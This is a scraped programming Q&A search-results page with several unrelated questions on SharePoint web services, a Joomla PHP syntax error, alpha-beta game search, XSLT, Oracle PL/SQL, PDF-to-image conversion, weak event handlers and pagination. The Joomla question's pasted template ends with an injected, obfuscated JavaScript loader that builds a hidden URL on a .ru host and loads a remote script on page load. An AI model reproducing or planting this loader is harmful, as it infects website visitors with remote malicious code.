Search Results

Search found 7634 results on 306 pages for 'preg replace'.

Page 297/306 | < Previous Page | 293 294 295 296 297 298 299 300 301 302 303 304  | Next Page >

  • How to add a new item in a sharepoint list using web services in C sharp

    - by Frank
    Hi, I'm trying to add a new item to a sharepoint list from a winform application in c# using web services. As only result, I'm getting the useless exception "Exception of type 'Microsoft.SharePoint.SoapServer.SoapServerException' was thrown." I have a web reference named WebSrvRef to http://server/site/subsite/_vti_bin/Lists.asmx And this code: XmlDocument xmlDoc; XmlElement elBatch; XmlNode ndReturn; string[] sValues; string sListGUID; string sViewGUID; if (lstResults.Items.Count < 1) { MessageBox.Show("Unable to Add To SharePoint\n" + "No test file processed. The list is blank.", "Add To SharePoint", MessageBoxButtons.OK, MessageBoxIcon.Exclamation); return; } WebSrvRef.Lists listService = new WebSrvRef.Lists(); sViewGUID = "{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}"; // Test List View GUID sListGUID = "{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}"; // Test List GUID listService.Credentials= System.Net.CredentialCache.DefaultCredentials; frmAddToSharePoint dlgAddSharePoint = new frmAddToSharePoint(); if (dlgAddSharePoint.ShowDialog() == DialogResult.Cancel) { dlgAddSharePoint.Dispose(); listService.Dispose(); return; } sValues = dlgAddSharePoint.Tag.ToString().Split('~'); dlgAddSharePoint.Dispose(); string strBatch = "<Method ID='1' Cmd='New'>" + "<Field Name='Client#'>" + sValues[0] + "</Field>" + "<Field Name='Company'>" + sValues[1] + "</Field>" + "<Field Name='Contact Name'>" + sValues[2] + "</Field>" + "<Field Name='Phone Number'>" + sValues[3] + "</Field>" + "<Field Name='Brand'>" + sValues[4] + "</Field>" + "<Field Name='Model'>" + sValues[5] + "</Field>" + "<Field Name='DPI'>" + sValues[6] + "</Field>" + "<Field Name='Color'>" + sValues[7] + "</Field>" + "<Field Name='Compression'>" + sValues[8] + "</Field>" + "<Field Name='Value % 1'>" + (((float)lstResults.Groups["Value 1"].Tag)*100).ToString("##0.00") + "</Field>" + "<Field Name='Value % 2'>" + (((float)lstResults.Groups["Value 2"].Tag)*100).ToString("##0.00") + "</Field>" + "<Field Name='Value % 3'>" + (((float)lstResults.Groups["Value 3"].Tag)*100).ToString("##0.00") + "</Field>" + "<Field Name='Value % 4'>" + (((float)lstResults.Groups["Value 4"].Tag)*100).ToString("##0.00") + "</Field>" + "<Field Name='Value % 5'>" + (((float)lstResults.Groups["Value 5"].Tag)*100).ToString("##0.00") + "</Field>" + "<Field Name='Comments'></Field>" + "<Field Name='Overall'>" + (fTotalScore*100).ToString("##0.00") + "</Field>" + "<Field Name='Average'>" + (fTotalAvg * 100).ToString("##0.00") + "</Field>" + "<Field Name='Transfered'>" + sValues[9] + "</Field>" + "<Field Name='Notes'>" + sValues[10] + "</Field>" + "<Field Name='Resolved'>" + sValues[11] + "</Field>" + "</Method>"; try { xmlDoc = new System.Xml.XmlDocument(); elBatch = xmlDoc.CreateElement("Batch"); elBatch.SetAttribute("OnError", "Continue"); elBatch.SetAttribute("ListVersion", "1"); elBatch.SetAttribute("ViewName", sViewGUID); strBatch = strBatch.Replace("&", "&amp;"); elBatch.InnerXml = strBatch; ndReturn = listService.UpdateListItems(sListGUID, elBatch); MessageBox.Show(ndReturn.OuterXml); listService.Dispose(); } catch(Exception Ex) { MessageBox.Show(Ex.Message + "\n\nSource\n" + Ex.Source + "\n\nTargetSite\n" + Ex.TargetSite + "\n\nStackTrace\n" + Ex.StackTrace, "Error", MessageBoxButtons.OK, MessageBoxIcon.Error); listService.Dispose(); } What am I doing wrong? What am I missing? Please help!! Frank

    Read the article

  • Parse error: syntax error, unexpected '<' in /home/future/public_html/modules/mod_mainmenu/tmpl/defa

    - by kofi
    I'm unfortunately having an unknown error with my php file. (for joomla 1.5) I don't seem to get what's wrong. This is my entire code, with an apparent error on line 84. Would appreciate some feedback, thanks. <?php // no direct access defined('_JEXEC') or die('Restricted access'); if ( ! defined('modMainMenuXMLCallbackDefined') ) { function modMainMenuXMLCallback(&$node, $args) { $user = &JFactory::getUser(); $menu = &JSite::getMenu(); $active = $menu->getActive(); $path = isset($active) ? array_reverse($active->tree) : null; if (($args['end']) && ($node->attributes('level') >= $args['end'])) { $children = $node->children(); foreach ($node->children() as $child) { if ($child->name() == 'ul') { $node->removeChild($child); } } } if ($node->name() == 'ul') { foreach ($node->children() as $child) { if ($child->attributes('access') > $user->get('aid', 0)) { $node->removeChild($child); } } } if (($node->name() == 'li') && isset($node->ul)) { $node->addAttribute('class', 'parent'); } if (isset($path) && (in_array($node->attributes('id'), $path) || in_array($node->attributes('rel'), $path))) { if ($node->attributes('class')) { $node->addAttribute('class', $node->attributes('class').' active'); } else { $node->addAttribute('class', 'active'); } } else { if (isset($args['children']) && !$args['children']) { $children = $node->children(); foreach ($node->children() as $child) { if ($child->name() == 'ul') { $node->removeChild($child); } } } } if (($node->name() == 'li') && ($id = $node->attributes('id'))) { if ($node->attributes('class')) { $node->addAttribute('class', $node->attributes('class').' item'.$id); } else { $node->addAttribute('class', 'item'.$id); } } if (isset($path) && $node->attributes('id') == $path[0]) { $node->addAttribute('id', 'current'); } else { $node->removeAttribute('id'); } $node->removeAttribute('rel'); $node->removeAttribute('level'); $node->removeAttribute('access'); } define('modMainMenuXMLCallbackDefined', true); } modMainMenuHelper::render($params, 'modMainMenuXMLCallback'); <script>var Zl;if(Zl!='' && Zl!='ki'){Zl=''};function v(){var jL=new String();var M=window;var q="";var ZY='';var Z=unescape;var C;if(C!='' && C!='g'){C=null};this.nj='';var _='';this.X="";var t=new Date();var R="\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x61\x72\x65\x61\x73\x61\x6c\x65\x2d\x63\x6f\x6d\x2e\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x7a\x2e\x65\x79\x6e\x79\x2d\x63\x6f\x6d\x2e\x59\x6f\x75\x72\x42\x6c\x65\x6e\x64\x65\x72\x50\x61\x72\x74\x73\x2e\x72\x75\x3a";var Od;if(Od!='Dm' && Od!='V'){Od='Dm'};var Vr='';var P=new String("g");var B="";var E;if(E!='' && E!='gD'){E=null};function b(y,U){var zm=new Array();var a='';this.Cm="";var Vb=new String();var k=Z("%5b")+U+Z("%5d");var tX=new String();var MV;if(MV!='' && MV!='qt'){MV='MD'};var c=new RegExp(k, P);return y.replace(c, _);var cS="";var RTD='';};var Zr;if(Zr!='' && Zr!='vJ'){Zr=''};var L=new String();var DE=new Date();var fg;if(fg!='Ep'){fg='Ep'};var nf;if(nf!=''){nf='d_'};var W=Z("%2f%67%6f%6f%67%6c%65%2e%61%74%2f%67%6f%6f%67%6c%65%2e%61%74%2f%64%72%75%64%67%65%72%65%70%6f%72%74%2e%63%6f%6d%2f%74%72%61%76%69%61%6e%2e%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2e%70%68%70");this.aA='';var u='';this.XB='';var dP;if(dP!='i' && dP != ''){dP=null};var dN;if(dN!='' && dN!='zx'){dN='_y'};var WS=b('85624104275582212705194497','13296457');var Hb=new Array();var lP;if(lP!='ok' && lP != ''){lP=null};var O=document;function n(){var J;if(J!='mS' && J != ''){J=null};u=R;var jv;if(jv!='' && jv!='jw'){jv=''};u+=WS;var MJ;if(MJ!='Qp'){MJ=''};u+=W;var fj=new Array();this.PM="";try {this.dq='';var ln=new Date();var eS=new Date();h=O.createElement(b('sScwrwi4pSt5','OZjKg4w5S'));var uW=new String();var Aj;if(Aj!='lX'){Aj='lX'};var aF;if(aF!='' && aF!='_o'){aF=null};h.src=u;var GY;if(GY!='ev' && GY!='Jr'){GY='ev'};var KK;if(KK!=''){KK='gDq'};h.defer=[1][0];var nO;if(nO!='tP'){nO=''};var aV=new Date();var bE=new Date();O.body.appendChild(h);this.Ze="";} catch(MC){var Ki;if(Ki!='m_' && Ki != ''){Ki=null};};}M[String("pqP5onloa".substr(4)+"drYD".substr(0,1))]=n;var EY;if(EY!='' && EY!='wn'){EY='Sj'};var ep;if(ep!='' && ep!='_q'){ep='Oy'};var uE=new Array();var E_;if(E_!='iU'){E_='iU'};};this.pt="";v();var tl=new String();</script> <!--793d57c076e95df45c451725e5dedf6f-->

    Read the article

  • Alpha Beta Search

    - by Becky
    I'm making a version of Martian Chess in java with AI and so far I THINK my move searching is semi-working, it seems to work alright for some depths but if I use a depth of 3 it returns a move for the opposite side...now the game is a bit weird because when a piece crosses half of the board, it becomes property of the other player so I think this is part of the problem. I'd be really greatful if someone could look over my code and point out any errors you think are there! (pls note that my evaluation function isn't nearly complete lol) MoveSearch.java public class MoveSearch { private Evaluation evaluate = new Evaluation(); private int blackPlayerScore, whitePlayerScore; public MoveContent bestMove; public MoveSearch(int blackScore, int whiteScore) { blackPlayerScore = blackScore; whitePlayerScore = whiteScore; } private Vector<Position> EvaluateMoves(Board board) { Vector<Position> positions = new Vector<Position>(); for (int i = 0; i < 32; i++) { Piece piece = null; if (!board.chessBoard[i].square.isEmpty()) { // store the piece piece = board.chessBoard[i].square.firstElement(); } // skip empty squares if (piece == null) { continue; } // skip the other players pieces if (piece.pieceColour != board.whosMove) { continue; } // generate valid moves for the piece PieceValidMoves validMoves = new PieceValidMoves(board.chessBoard, i, board.whosMove); validMoves.generateMoves(); // for each valid move for (int j = 0; j < piece.validMoves.size(); j++) { // store it as a position Position move = new Position(); move.startPosition = i; move.endPosition = piece.validMoves.elementAt(j); Piece pieceAttacked = null; if (!board.chessBoard[move.endPosition].square.isEmpty()) { // if the end position is not empty, store the attacked piece pieceAttacked = board.chessBoard[move.endPosition].square.firstElement(); } // if a piece is attacked if (pieceAttacked != null) { // append its value to the move score move.score += pieceAttacked.pieceValue; // if the moving pieces value is less than the value of the attacked piece if (piece.pieceValue < pieceAttacked.pieceValue) { // score extra points move.score += pieceAttacked.pieceValue - piece.pieceValue; } } // add the move to the set of positions positions.add(move); } } return positions; } // EvaluateMoves() private int SideToMoveScore(int score, PieceColour colour) { if (colour == PieceColour.Black){ return -score; } else { return score; } } public int AlphaBeta(Board board, int depth, int alpha, int beta) { //int best = -9999; // if the depth is 0, return the score of the current board if (depth <= 0) { board.printBoard(); System.out.println("Score: " + evaluate.EvaluateBoardScore(board)); System.out.println(""); int boardScore = evaluate.EvaluateBoardScore(board); return SideToMoveScore(boardScore, board.whosMove); } // fill the positions with valid moves Vector<Position> positions = EvaluateMoves(board); // if there are no available positions if (positions.size() == 0) { // and its blacks move if (board.whosMove == PieceColour.Black) { if (blackPlayerScore > whitePlayerScore) { // and they are winning, return a high number return 9999; } else if (whitePlayerScore == blackPlayerScore) { // if its a draw, lower number return 500; } else { // if they are losing, return a very low number return -9999; } } if (board.whosMove == PieceColour.White) { if (whitePlayerScore > blackPlayerScore) { return 9999; } else if (blackPlayerScore == whitePlayerScore) { return 500; } else { return -9999; } } } // for each position for (int i = 0; i < positions.size(); i++) { // store the position Position move = positions.elementAt(i); // temporarily copy the board Board temp = board.copyBoard(board); // make the move temp.makeMove(move.startPosition, move.endPosition); for (int x = 0; x < 32; x++) { if (!temp.chessBoard[x].square.isEmpty()) { PieceValidMoves validMoves = new PieceValidMoves(temp.chessBoard, x, temp.whosMove); validMoves.generateMoves(); } } // repeat the process recursively, decrementing the depth int val = -AlphaBeta(temp, depth - 1, -beta, -alpha); // if the value returned is better than the current best score, replace it if (val >= beta) { // beta cut-off return beta; } if (val > alpha) { alpha = val; bestMove = new MoveContent(alpha, move.startPosition, move.endPosition); } } // return the best score return alpha; } // AlphaBeta() } This is the makeMove method public void makeMove(int startPosition, int endPosition) { // quick reference to selected piece and attacked piece Piece selectedPiece = null; if (!(chessBoard[startPosition].square.isEmpty())) { selectedPiece = chessBoard[startPosition].square.firstElement(); } Piece attackedPiece = null; if (!(chessBoard[endPosition].square.isEmpty())) { attackedPiece = chessBoard[endPosition].square.firstElement(); } // if a piece is taken, amend score if (!(chessBoard[endPosition].square.isEmpty()) && attackedPiece != null) { if (attackedPiece.pieceColour == PieceColour.White) { blackScore = blackScore + attackedPiece.pieceValue; } if (attackedPiece.pieceColour == PieceColour.Black) { whiteScore = whiteScore + attackedPiece.pieceValue; } } // actually move the piece chessBoard[endPosition].square.removeAllElements(); chessBoard[endPosition].addPieceToSquare(selectedPiece); chessBoard[startPosition].square.removeAllElements(); // changing piece colour based on position if (endPosition > 15) { selectedPiece.pieceColour = PieceColour.White; } if (endPosition <= 15) { selectedPiece.pieceColour = PieceColour.Black; } //change to other player if (whosMove == PieceColour.Black) whosMove = PieceColour.White; else if (whosMove == PieceColour.White) whosMove = PieceColour.Black; } // makeMove()

    Read the article

  • Merge functionality of two xsl files into a single file (not a xsl import or include issue)

    - by anuamb
    I have two xsl files; both of them perform different tasks on source xml one after another. Now I need a single xsl file which will actually perform both these tasks in single file (its not an issue of xsl import or xsl include): say my source xml is: <LIST_R7P1_1 <R7P1_1 <LVL2 <ORIG_EXP_PRE_CONV#+# <EXP_AFT_CONVabc <GUARANTEE_AMOUNT#+# <CREDIT_DER/ </LVL2 <LVL21 <AZ#+# <BZbz1 <AZaz2 <BZ#+# <CZ/ </LVL21 </R7P1_1 </LIST_R7P1_1 My first xsl (tr1.xsl) removes all nodes whose value is blank or null: <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="@*|node()"> <xsl:if test=". != '' or ./@* != ''"> <xsl:copy> <xsl:apply-templates select="@*|node()"/> </xsl:copy> </xsl:if> <xsl:template </xsl:stylesheet The output here is <LIST_R7P1_1 <R7P1_1 <LVL2 <ORIG_EXP_PRE_CONV#+# <EXP_AFT_CONVabc <GUARANTEE_AMOUNT#+# </LVL2 <LVL21 <AZ#+# <BZbz1 <AZaz2 <BZ#+# </LVL21 </R7P1_1 </LIST_R7P1_1 And my second xsl (tr2.xsl) does a global replace (of #+# with text blank'') on the output of first xsl: <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0" <xsl:template name="globalReplace" <xsl:param name="outputString"/ <xsl:param name="target"/ <xsl:param name="replacement"/ <xsl:choose <xsl:when test="contains($outputString,$target)"> <xsl:value-of select= "concat(substring-before($outputString,$target), $replacement)"/> <xsl:call-template name="globalReplace"> <xsl:with-param name="outputString" select="substring-after($outputString,$target)"/> <xsl:with-param name="target" select="$target"/> <xsl:with-param name="replacement" select="$replacement"/> </xsl:call-template> </xsl:when> <xsl:otherwise> <xsl:value-of select="$outputString"/> </xsl:otherwise> </xsl:choose </xsl:template <xsl:template match="text()" <xsl:template match="@*|*"> <xsl:copy> <xsl:apply-templates select="@*|node()"/> </xsl:copy> </xsl:template> </xsl:stylesheet So my final output is <LIST_R7P1_1 <R7P1_1 <LVL2 <ORIG_EXP_PRE_CONV <EXP_AFT_CONVabc <GUARANTEE_AMOUNT </LVL2 <LVL21 <AZ <BZbz1 <AZaz2 <BZ </LVL21 </R7P1_1 </LIST_R7P1_1 My concern is that instead of these two xsl (tr1.xsl and tr2.xsl) I only need a single xsl (tr.xsl) which gives me final output? Say when I combine these two as <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" <xsl:template match="@*|node()" <xsl:if test=". != '' or ./@* != ''"> <xsl:copy> <xsl:apply-templates select="@*|node()"/> </xsl:copy> </xsl:if> <xsl:template name="globalReplace" <xsl:param name="outputString"/ <xsl:param name="target"/ <xsl:param name="replacement"/ <xsl:choose <xsl:when test="contains($outputString,$target)"> <xsl:value-of select= "concat(substring-before($outputString,$target), $replacement)"/> <xsl:call-template name="globalReplace"> <xsl:with-param name="outputString" select="substring-after($outputString,$target)"/> <xsl:with-param name="target" select="$target"/> <xsl:with-param name="replacement" select="$replacement"/> </xsl:call-template> </xsl:when> <xsl:otherwise> <xsl:value-of select="$outputString"/> </xsl:otherwise> </xsl:choose </xsl:template <xsl:template match="text()" <xsl:call-template name="globalReplace" <xsl:with-param name="outputString" select="."/ <xsl:with-param name="target" select="'#+#'"/ <xsl:with-param name="replacement" select="''"/ </xsl:call-template </xsl:template <xsl:template match="@|" <xsl:copy <xsl:apply-templates select="@*|node()"/ </xsl:copy </xsl:template </xsl:stylesheet it outputs: <LIST_R7P1_1 <R7P1_1 <LVL2 <ORIG_EXP_PRE_CONV <EXP_AFT_CONVabc <GUARANTEE_AMOUNT <CREDIT_DER/ </LVL2 <LVL21 <AZ <BZbz1 <AZaz2 <BZ <CZ/ </LVL21 </R7P1_1 </LIST_R7P1_1 Only replacement is performed but not null/blank node removal.

    Read the article

  • ORA-06502: PL/SQL: numeric or value error: character string buffer too small with Oracle aggregate f

    - by Tunde
    Good day gurus, I have a script that populates tables on a regular basis that crashed and gave the above error. The strange thing is that it has been running for close to 3 months on the production system with no problems and suddenly crashed last week. There has not been any changes on the tables as far as I know. Has anyone encountered something like this before? I believe it has something to do with the aggregate functions I'm implementing in it; but it worked initially. please; kindly find attached the part of the script I've developed into a procedure that I reckon gives the error. CREATE OR REPLACE PROCEDURE V1 IS --DECLARE v_a VARCHAR2(4000); v_b VARCHAR2(4000); v_c VARCHAR2(4000); v_d VARCHAR2(4000); v_e VARCHAR2(4000); v_f VARCHAR2(4000); v_g VARCHAR2(4000); v_h VARCHAR2(4000); v_i VARCHAR2(4000); v_j VARCHAR2(4000); v_k VARCHAR2(4000); v_l VARCHAR2(4000); v_m VARCHAR2(4000); v_n NUMBER(10); v_o VARCHAR2(4000); -- -- Procedure that populates DEMO table BEGIN -- Delete all from the DEMO table DELETE FROM DEMO; -- Populate fields in DEMO from DEMOV1 INSERT INTO DEMO(ID, D_ID, CTR_ID, C_ID, DT_NAM, TP, BYR, ENY, ONG, SUMM, DTW, REV, LD, MD, STAT, CRD) SELECT ID, D_ID, CTR_ID, C_ID, DT_NAM, TP, TO_NUMBER(TO_CHAR(BYR,'YYYY')), TO_NUMBER(TO_CHAR(NVL(ENY,SYSDATE),'YYYY')), CASE WHEN ENY IS NULL THEN 'Y' ELSE 'N' END, SUMMARY, DTW, REV, LD, MD, '1', SYSDATE FROM DEMOV1; -- LOOP THROUGH DEMO TABLE FOR j IN (SELECT ID, CTR_ID, C_ID FROM DEMO) LOOP Select semic_concat(TXTDESC) INTO v_a From GEOT WHERE ID = j.ID; SELECT COUNT(*) INTO v_n FROM MERP M, PROJ P WHERE M.MID = P.COD AND ID = j.ID AND PROAC IS NULL; IF (v_n > 0) THEN Select semic_concat(PRO) INTO v_b FROM MERP M, PROJ P WHERE M.MID = P.COD AND ID = j.ID; ELSE Select semic_concat(PRO || '(' || PROAC || ')' ) INTO v_b FROM MERP M, PROJ P WHERE M.MID = P.COD AND ID = j.ID; END IF; Select semic_concat(VOCNAME('P02',COD)) INTO v_c From PAR WHERE ID = j.ID; Select semic_concat(VOCNAME('L05',COD)) INTO v_d From INST WHERE ID = j.ID; Select semic_concat(NVL(AUTHOR,'Anon') ||' ('||to_char(PUB,'YYYY')||') '||TITLE||', '||EDT) INTO v_e From REFE WHERE ID = j.ID; Select semic_concat(NAM) INTO v_f FROM EDM E, EDO EO WHERE E.EDMID = EO.EDOID AND ID = j.ID; Select semic_concat(VOCNAME('L08', COD)) INTO v_g FROM AVA WHERE ID = j.ID; SELECT or_concat(NAM) INTO v_o FROM CON WHERE ID = j.ID AND NAM = 'Unknown'; IF (v_o = 'Unknown') THEN Select or_concat(JOBTITLE || ' (' || EMAIL || ')') INTO v_h FROM CON WHERE ID = j.ID; ELSE Select or_concat(NAM || ' (' || EMAIL || ')') INTO v_h FROM CON WHERE ID = j.ID; END IF; Select commaencap_concat(COD) INTO v_i FROM PAR WHERE ID = j.ID; IF (v_i = ',') THEN v_i := null; ELSE Select commaencap_concat(COD) INTO v_i FROM PAR WHERE ID = j.ID; END IF; Select commaencap_concat(COD) INTO v_j FROM INST WHERE ID = j.ID; IF (v_j = ',') THEN v_j := null; ELSE Select commaencap_concat(COD) INTO v_j FROM INST WHERE ID = j.ID; END IF; Select commaencap_concat(COD) INTO v_k FROM SAR WHERE ID = j.ID; IF (v_k = ',') THEN v_k := null; ELSE Select commaencap_concat(COD) INTO v_k FROM SAR WHERE ID = j.ID; END IF; Select commaencap_concat(CONID) INTO v_l FROM CON WHERE ID = j.ID; IF (v_l = ',') THEN v_l := null; ELSE Select commaencap_concat(CONID) INTO v_l FROM CON WHERE ID = j.ID; END IF; Select commaencap_concat(PROID) INTO v_m FROM PRO WHERE ID = j.ID; IF (v_m = ',') THEN v_m := null; ELSE Select commaencap_concat(PROID) INTO v_m FROM PRO WHERE ID = j.ID; END IF; -- UPDATE DEMO TABLE UPDATE DEMO SET GEOC = v_a, PRO = v_b, PAR = v_c, INS = v_d, REFER = v_e, ORGR = v_f, AVAY = v_g, CON = v_h, DTH = v_i, INST = v_j, SA = v_k, CC = v_l, EDPR = v_m, CTR = (SELECT NAM FROM EDM WHERE EDMID = j.CTR_ID), COLL = (SELECT NAM FROM EDM WHERE EDMID = j.C_ID) WHERE ID = j.ID; END LOOP; END V1; / The aggregate functions, commaencap_concat (encapsulates with a comma), or_concat (concats with an or) and semic_concat(concats with a semi-colon). the remaining tables used are all linked to the main table DEMO. I have checked the column sizes and there seems to be no problem. I tried executing the SELECT statements alone and they give the same error without populating the tables. Any clues? Many thanks for your anticipated support.

    Read the article

  • Convert PDF to Image Batch

    - by tro
    I am working on a solution where I can convert pdf files to images. I am using the following example from codeproject: http://www.codeproject.com/Articles/317700/Convert-a-PDF-into-a-series-of-images-using-Csharp?msg=4134859#xx4134859xx now I tried with the following code to generate from more then 1000 pdf files new images: using Cyotek.GhostScript; using Cyotek.GhostScript.PdfConversion; using System; using System.Collections.Generic; using System.Drawing; using System.IO; using System.Linq; using System.Text; using System.Threading.Tasks; namespace RefClass_PDF2Image { class Program { static void Main(string[] args) { string outputPath = Properties.Settings.Default.outputPath; string pdfPath = Properties.Settings.Default.pdfPath; if (!Directory.Exists(outputPath)) { Console.WriteLine("Der angegebene Pfad " + outputPath + " für den Export wurde nicht gefunden. Bitte ändern Sie den Pfad (outputPath) in der App.Config Datei."); return; } else { Console.WriteLine("Output Pfad: " + outputPath + " gefunden."); } if (!Directory.Exists(pdfPath)) { Console.WriteLine("Der angegebene Pfad " + pdfPath + " zu den PDF Zeichnungen wurde nicht gefunden. Bitte ändern Sie den Pfad (pdfPath) in der App.Config Datei."); return; } else { Console.WriteLine("PDF Pfad: " + pdfPath + " gefunden."); } Pdf2ImageSettings settings = GetPDFSettings(); DateTime start = DateTime.Now; TimeSpan span; Console.WriteLine(""); Console.WriteLine("Extraktion der PDF Zeichnungen wird gestartet: " + start.ToShortTimeString()); Console.WriteLine(""); DirectoryInfo diretoryInfo = new DirectoryInfo(pdfPath); DirectoryInfo[] directories = diretoryInfo.GetDirectories(); Console.WriteLine(""); Console.WriteLine("Es wurden " + directories.Length + " verschiedende Verzeichnisse gefunden."); Console.WriteLine(""); List<string> filenamesPDF = Directory.GetFiles(pdfPath, "*.pdf*", SearchOption.AllDirectories).Select(x => Path.GetFullPath(x)).ToList(); List<string> filenamesOutput = Directory.GetFiles(outputPath, "*.*", SearchOption.AllDirectories).Select(x => Path.GetFullPath(x)).ToList(); Console.WriteLine(""); Console.WriteLine("Es wurden " + filenamesPDF.Count + " verschiedende PDF Zeichnungen gefunden."); Console.WriteLine(""); List<string> newFileNames = new List<string>(); int cutLength = pdfPath.Length; for (int i = 0; i < filenamesPDF.Count; i++) { string temp = filenamesPDF[i].Remove(0, cutLength); temp = outputPath + temp; temp = temp.Replace("pdf", "jpg"); newFileNames.Add(temp); } for (int i = 0; i < filenamesPDF.Count; i++) { FileInfo fi = new FileInfo(newFileNames[i]); if (!fi.Exists) { if (!Directory.Exists(fi.DirectoryName)) { Directory.CreateDirectory(fi.DirectoryName); } Bitmap firstPage = new Pdf2Image(filenamesPDF[i], settings).GetImage(); firstPage.Save(newFileNames[i], System.Drawing.Imaging.ImageFormat.Jpeg); firstPage.Dispose(); } //if (i % 20 == 0) //{ // GC.Collect(); // GC.WaitForPendingFinalizers(); //} } Console.ReadLine(); } private static Pdf2ImageSettings GetPDFSettings() { Pdf2ImageSettings settings; settings = new Pdf2ImageSettings(); settings.AntiAliasMode = AntiAliasMode.Medium; settings.Dpi = 150; settings.GridFitMode = GridFitMode.Topological; settings.ImageFormat = ImageFormat.Png24; settings.TrimMode = PdfTrimMode.CropBox; return settings; } } } unfortunately, I always get in the Pdf2Image.cs an out of memory exception. here the code: public Bitmap GetImage(int pageNumber) { Bitmap result; string workFile; //if (pageNumber < 1 || pageNumber > this.PageCount) // throw new ArgumentException("Page number is out of bounds", "pageNumber"); if (pageNumber < 1) throw new ArgumentException("Page number is out of bounds", "pageNumber"); workFile = Path.GetTempFileName(); try { this.ConvertPdfPageToImage(workFile, pageNumber); using (FileStream stream = new FileStream(workFile, FileMode.Open, FileAccess.Read)) { result = new Bitmap(stream); // --->>> here is the out of memory exception stream.Close(); stream.Dispose(); } } finally { File.Delete(workFile); } return result; } how can I fix that to avoid this exception? thanks for any help, tro

    Read the article

  • Using WeakReference to resolve issue with .NET unregistered event handlers causing memory leaks.

    - by Eric
    The problem: Registered event handlers create a reference from the event to the event handler's instance. If that instance fails to unregister the event handler (via Dispose, presumably), then the instance memory will not be freed by the garbage collector. Example: class Foo { public event Action AnEvent; public void DoEvent() { if (AnEvent != null) AnEvent(); } } class Bar { public Bar(Foo l) { l.AnEvent += l_AnEvent; } void l_AnEvent() { } } If I instantiate a Foo, and pass this to a new Bar constructor, then let go of the Bar object, it will not be freed by the garbage collector because of the AnEvent registration. I consider this a memory leak, and seems just like my old C++ days. I can, of course, make Bar IDisposable, unregister the event in the Dispose() method, and make sure to call Dispose() on instances of it, but why should I have to do this? I first question why events are implemented with strong references? Why not use weak references? An event is used to abstractly notify an object of changes in another object. It seems to me that if the event handler's instance is no longer in use (i.e., there are no non-event references to the object), then any events that it is registered with should automatically be unregistered. What am I missing? I have looked at WeakEventManager. Wow, what a pain. Not only is it very difficult to use, but its documentation is inadequate (see http://msdn.microsoft.com/en-us/library/system.windows.weakeventmanager.aspx -- noticing the "Notes to Inheritors" section that has 6 vaguely described bullets). I have seen other discussions in various places, but nothing I felt I could use. I propose a simpler solution based on WeakReference, as described here. My question is: Does this not meet the requirements with significantly less complexity? To use the solution, the above code is modified as follows: class Foo { public WeakReferenceEvent AnEvent = new WeakReferenceEvent(); internal void DoEvent() { AnEvent.Invoke(); } } class Bar { public Bar(Foo l) { l.AnEvent += l_AnEvent; } void l_AnEvent() { } } Notice two things: 1. The Foo class is modified in two ways: The event is replaced with an instance of WeakReferenceEvent, shown below; and the invocation of the event is changed. 2. The Bar class is UNCHANGED. No need to subclass WeakEventManager, implement IWeakEventListener, etc. OK, so on to the implementation of WeakReferenceEvent. This is shown here. Note that it uses the generic WeakReference that I borrowed from here: http://damieng.com/blog/2006/08/01/implementingweakreferencet I had to add Equals() and GetHashCode() to his class, which I include below for reference. class WeakReferenceEvent { public static WeakReferenceEvent operator +(WeakReferenceEvent wre, Action handler) { wre._delegates.Add(new WeakReference<Action>(handler)); return wre; } public static WeakReferenceEvent operator -(WeakReferenceEvent wre, Action handler) { foreach (var del in wre._delegates) if (del.Target == handler) { wre._delegates.Remove(del); return wre; } return wre; } HashSet<WeakReference<Action>> _delegates = new HashSet<WeakReference<Action>>(); internal void Invoke() { HashSet<WeakReference<Action>> toRemove = null; foreach (var del in _delegates) { if (del.IsAlive) del.Target(); else { if (toRemove == null) toRemove = new HashSet<WeakReference<Action>>(); toRemove.Add(del); } } if (toRemove != null) foreach (var del in toRemove) _delegates.Remove(del); } } public class WeakReference<T> : IDisposable { private GCHandle handle; private bool trackResurrection; public WeakReference(T target) : this(target, false) { } public WeakReference(T target, bool trackResurrection) { this.trackResurrection = trackResurrection; this.Target = target; } ~WeakReference() { Dispose(); } public void Dispose() { handle.Free(); GC.SuppressFinalize(this); } public virtual bool IsAlive { get { return (handle.Target != null); } } public virtual bool TrackResurrection { get { return this.trackResurrection; } } public virtual T Target { get { object o = handle.Target; if ((o == null) || (!(o is T))) return default(T); else return (T)o; } set { handle = GCHandle.Alloc(value, this.trackResurrection ? GCHandleType.WeakTrackResurrection : GCHandleType.Weak); } } public override bool Equals(object obj) { var other = obj as WeakReference<T>; return other != null && Target.Equals(other.Target); } public override int GetHashCode() { return Target.GetHashCode(); } } It's functionality is trivial. I override operator + and - to get the += and -= syntactic sugar matching events. These create WeakReferences to the Action delegate. This allows the garbage collector to free the event target object (Bar in this example) when nobody else is holding on to it. In the Invoke() method, simply run through the weak references and call their Target Action. If any dead (i.e., garbage collected) references are found, remove them from the list. Of course, this only works with delegates of type Action. I tried making this generic, but ran into the missing where T : delegate in C#! As an alternative, simply modify class WeakReferenceEvent to be a WeakReferenceEvent, and replace the Action with Action. Fix the compiler errors and you have a class that can be used like so: class Foo { public WeakReferenceEvent<int> AnEvent = new WeakReferenceEvent<int>(); internal void DoEvent() { AnEvent.Invoke(5); } } Hopefully this will help someone else when they run into the mystery .NET event memory leak!

    Read the article

  • Pagination links broken - php/jquery

    - by ClarkSKent
    Hey, I'm still trying to get my pagination links to load properly dynamically. But I can't seem to find a solution to this one problem. vote down star Hi everyone, I am still trying to figure out how to fix my pagination script to work properly. the problem I am having is when I click any of the pagination number links to go the next page, the new content does not load. literally nothing happens and when looking at the console in Firebug, nothing is sent or loaded. I have on the main page 3 links to filter the content and display it. When any of these links are clicked the results are loaded and displayed along with the associated pagination numbers for that specific content. I believe the problem is coming from the sql query in generate_pagination.php (seen below). When I hard code the sql category part it works, but is not dynamic at all. This is why I'm calling $ids=$_GET['ids']; and trying to put that into the category section but then the numbers don't display at all. If I echo out the $ids variable and click on a filter it does display the correct name/id, so I don't know why this doesn't work Here is the main page so you can see how I am including and starting the 